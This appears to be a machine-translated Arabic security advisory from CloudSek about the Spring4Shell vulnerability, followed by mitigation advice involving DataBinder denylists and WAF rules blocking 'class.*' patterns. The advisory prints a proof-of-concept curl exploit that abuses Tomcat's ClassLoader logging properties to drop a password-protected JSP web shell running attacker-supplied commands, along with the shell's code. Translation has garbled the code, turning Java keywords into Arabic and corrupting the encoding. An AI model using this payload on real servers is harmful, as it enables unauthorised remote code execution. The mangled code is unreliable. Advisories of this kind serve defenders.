🚀 أصبحت CloudSek أول شركة للأمن السيبراني من أصل هندي تتلقى استثمارات منها ولاية أمريكية صندوق
اقرأ المزيد


يتم سرد المنشورات المختلفة المتعلقة بالاستغلال الذي تم إصداره لـ Spring4Shell على النحو التالي:



إثبات المفهوم (الاستغلال)
curl -v -d «class.module.classloader.resources.context.parent.pailine .first.pattern=% 25% 7Bc 2% di%20 إذا (%22j%22) يساوي (%22pwd%22))) %7b%20 java.io.تدفق المدخلات %20 في% 20% 3D% 20% 25% 7Bc 17% DI.get وقت إعادة التشغيل () .exec (طلب. احصل على المعلمة (%22 سم md%22)). احصل على تيار الإدخال () %3b%20int% 20a% 20% 3D% 20-1% 3B%20 بايت %5b %20b %20 جديد %20 بايت %5b 2048% 5D %3B%20 بينما (A%3din.read (b)) 3D-1) %7b%20 الإخراج. printLN (سلسلة %20 جديدة (ب)) %3B% 20% 7 D% 20% 7D% 20% 25% لاحقة 7B %7DI وclass.module.classloader.resources. Context. parent.pipeline. first.suffix=.jsp&class.module.classloader.resources. context.parent.pipeline.first.Directory=تطبيقات الويب/root&class.module.cl assloader.resources.context.parent.pipeline. first.pirex=Tomcatwar & CL. resources.context.parent.pipeline. first.filedat eFormat=» http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1 - Snapshot/rapid7
تقوم هذه الحمولة بإسقاط غلاف ويب محمي بكلمة مرور في دليل Tomcat Root يسمى tomcatwar.jsp
- إذا كان («j» .يساوي (request.getParameter («pwd»)) {java.io.inputStream in = -.getRunTime () .exec (request.getParameter («cmd»)) .getInputStream ()؛ int a = -1؛ البايت [] b = البايت الجديد [2048]؛ بينما ((a=in.read (b)) 3D-1) {out. printll n (سلسلة جديدة (ب))؛}} -
تعمل هذه الحمولة الخاصة بخادم Tomcat على تغيير خصائص تسجيل خادم Tomcat عبر ClassLoader. تقوم الحمولة ببساطة بإعادة توجيه منطق التسجيل إلى دليل ROOT وإسقاط حمولة الملف +.

المستخدمون الذين يقومون بتشغيل الإصدار 9 من JDK والإصدارات الأحدث معرضون لهجوم RCE. أيضًا، يُقال إن جميع إصدارات Spring Core قد تأثرت.
في الوقت الحالي، لا يوجد تصحيح رسمي من الربيع. ومن ثم يمكن للجهات الفاعلة في مجال التهديد الاستفادة من هذه الثغرة الأمنية في الأداء تنفيذ التعليمات البرمجية عن بُعد غير المصرح به. نظرًا لسهولة الاستغلال، قد تقوم الجهات الفاعلة المهددة بأنشطة استغلال واسعة النطاق على غرار لوغ4j. يمكن للمهاجمين استغلال الثغرة الأمنية لتنفيذ هجمات البرامج الضارة أو برامج الفدية على المؤسسة
في Spring Framework، يحتوي DataBinder على وظيفة عدم السماح بأنماط معينة. كتخفيف مؤقت لهذه الثغرة الأمنية، فإن نصيحة وحدة التحكم يمكن إنشاء المكون (وهو مكون Spring مشترك عبر وحدات التحكم) ويمكن إضافة أنماط خطيرة إلى denylist.
على أجهزة حماية الشبكة مثل WAF، قم بتطبيق تصفية القواعد لسلاسل مثل «class.*» و «Class.*» و «*.class.*» و «*.Class.*» وفقًا لحالة حركة المرور الفعلية للخدمات المنشورة. هذا لأن «Spring4Shell» يستفيد من الحقن في الفئة (شديد جدًا)
أخيرًا، يجب على المرء أن يظل على اطلاع دائم بأحدث إصدار من التصحيحات الرسمية من Spring وإصلاح الثغرات الأمنية وفقًا لهذه التصحيحات.






